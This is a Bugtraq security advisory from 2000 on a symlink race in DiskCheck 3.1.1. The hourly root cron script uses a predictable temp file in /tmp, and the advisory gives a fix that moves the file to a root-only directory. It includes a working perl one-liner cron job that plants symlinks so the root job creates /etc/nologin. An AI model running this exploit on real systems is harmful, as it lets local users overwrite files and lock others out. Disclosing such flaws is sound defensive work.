Date:         Sat, 5 Aug 2000 17:36:13 +0900
From: "You, Jin-Ho" <jhyou@CHONNAM.CHONNAM.AC.KR>
Subject:      Diskcheck 3.1.1 Symlink Vulnerability
To: BUGTRAQ@SECURITYFOCUS.COM

Diskcheck 3.1.1 Symlink Vulnerability

1 Introduction

DiskCheck is a Perl script that monitors how much space is available
on your hard drive.  Basically, it checks your drive space every
hour and takes action based on the specifications in the config file
/etc/diskcheck.conf.

DiskCheck 3.1.1 is available from
http://www.kaybee.org/~kirk/html/linux.html and
RedHat Powertools 6.x.

2 Vulnerability

The command, /etc/cron.hourly/diskcheck.pl is executed with root
privilege
every hour. It creates a temporary file, whose default name is
/tmp/diskusagealert.txt.<pid> defined in /etc/diskcheck.conf,
is predictable and is willing to follow symbolic links.  This may allow
malicious local users to create or overwrite arbitrarily named files.
3 Exploit

The following cron job creates the file, /etc/nologin.

0 * * * * perl -e 'foreach $i (1..200) { $pid = $$ + $i; \
   symlink("/etc/nologin", "/tmp/diskusagealert.txt.$pid"); }'

4 Solution

Relocate the temporary file into the directory where root only can
create
a file.

Example)

Edit /etc/diskcheck.conf

 $tempfile = '/var/local/diskusagealert.txt'

# ls -ld /var/local
drwxr-xr-x   2 root     root         1024 Feb  7  1996 /var/local/


You, Jin-Ho, jhyou@chonnam.ac.kr